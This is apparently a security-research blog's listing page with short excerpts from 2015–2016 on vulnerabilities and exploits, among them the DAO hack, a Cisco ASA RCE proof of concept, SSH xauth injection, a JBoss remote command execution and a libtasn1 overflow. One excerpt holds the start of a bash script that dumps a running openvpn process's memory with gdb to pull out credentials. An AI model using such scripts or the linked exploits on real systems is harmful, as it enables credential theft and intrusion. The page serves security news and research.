Metasploit
  • ISGroup Independent Research [EN]
  • ISGroup Partner per la sicurezza [IT]
  • June 21, 2016

    Cryptocurrency and Smart-Contracts security fail: the Ethereum $59 Million hack

    Ethers is a cryptocurrency designed to power smart-contracts, autonomous programs that define how an amount of money will behave. A simple race condition in a very large smart-contract code allowed an attacker to steal $59 million of value from the DAO account: Bitcoin’s Largest Competitor Hacked: Over $59 Million “Ethers” Stolen In Ongoing Attack. Details here […]

  • June 16, 2016

    Security nightmares are going Low-Level

    Java and Flash have been and still are terrible 3rd party components when it comes to the security of our PCs. While from a functional point of view they were rocket science in the ’90 (anybody who remember ActiveX would agree) nowadays they are sluggish, weakly integrated, rectangles in our web pages. Finally both Oracle and Adobe […]

  • May 18, 2016

    Cisco ASA Exploit Released!

    On February 2016 we sent an Early Warnings to our customers for a remote code execution (RCE) in Cisco ASA (CVE-2016-1287 or cisco-sa-20160210-asa-ike). Today a POC has been published: https://github.com/exodusintel/disclosures/blob/master/CVE_2016_1287_PoC You can fond more details on: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1287 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160210-asa-ike https://blog.exodusintel.com/2016/02/10/firewall-hacking/

  • March 14, 2016

    Time to supercharge your restricted SSH accounts!

    Time to hack restricted SSH accounts thanks to an injection in the “xauth” command! Not an exploit for everyone but CVE-2016-3115 and CVE-2016-3116 details have just been published on Full Disclosure, and they will be useful to a lot of people for sure :) If your remote provider gives you a restricted SSH access using a forced-command […]

  • November 20, 2015

    JSF ViewState upside-down

    Renaud Dubourguais and Nicolas Collignon released a nice paper on Java Server Faces security titled JSF ViewState upside-down (http://www.synacktiv.fr/ressources/JSF_ViewState_InYourFace.pdf). JSF implementations are often used in J2EE applications. JSF uses ViewStates which have already been discussed for cryptographic weaknesses like with the oracle padding attack [PADDING]. ViewStates have also been abused to create client side attacks […]

  • October 25, 2015

    Grab credentials from a running openvpn process in Linux

    #!/bin/bash # This little hack-job will grab credentials from a running openvpn process in Linux # Keep in mind this won’t work if the user used the –auth-nocache flag grep rw-p /proc/$1/maps | sed -n ‘s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p’ | while read start stop; do gdb –batch-silent –silent –pid $1 -ex “dump memory $1-$start-$stop.dump 0x$start 0x$stop”; […]

  • October 9, 2015

    Fishing the AWS IP Pool for Dangling Domains

    Fishing the AWS IP Pool for Dangling Domains: Amazon and other cloud providers have made it child’s play to spin up ephemeral server instances for quick deployment of various services. If you want a web server to host your new .io domain name, you can have it set up in no time at all. Starting a website […]

  • October 9, 2015

    Netgear R6200 wireless router pwnage

    http://shadow-file.blogspot.it/2015/04/broken-abandoned-and-forgotten-code_22.html http://shadow-file.blogspot.it/2015/04/abandoned-part-01.html http://shadow-file.blogspot.it/2015/04/abandoned-part-02.html http://shadow-file.blogspot.it/2015/05/abandoned-part-03.html http://shadow-file.blogspot.it/2015/05/abandoned-part-04.html http://shadow-file.blogspot.it/2015/05/abandoned-part-05.html http://shadow-file.blogspot.it/2015/05/abandoned-part-06.html http://shadow-file.blogspot.it/2015/06/abandoned-part-07.html http://shadow-file.blogspot.it/2015/06/abandoned-part-08.html http://shadow-file.blogspot.it/2015/06/abandoned-part-09.html http://shadow-file.blogspot.it/2015/07/abandoned-part-10.html http://shadow-file.blogspot.it/2015/07/abandoned-part-11.html http://shadow-file.blogspot.it/2015/09/abandoned-part-12.html http://shadow-file.blogspot.it/2015/10/abandoned-part-13.html There is even a Github repository for the project!

  • March 31, 2015

    Stack overflow in libtasn1

    Stack overflow in libtasn1: libtasn1 is a library to parse ASN.1 data structures. Its most prominent user is GnuTLS. Fuzzing libtasn1 led to the discovery of a stack write overflow in the function _asn1_ltostr (file parser_aux.c). It overflows a temporary buffer variable on certain inputs. This issue has been reported to the developers on 2015-03-26. A fix was released […]

  • March 31, 2015

    JBoss JMXInvokerServlet Remote Command Execution

    JBoss JMXInvokerServlet Remote Command Execution: This code exploits a common misconfiguration in JBoss Application Server. Whenever the JMX Invoker is exposed with the default configuration, a malicious “MarshalledInvocation” serialized Java object allows to execute arbitrary code. This exploit works even if the “Web-Console” and the “JMX Console” are protected or disabled.

Copyright © 2023 by ISGroup SRL - All Rights Reserved -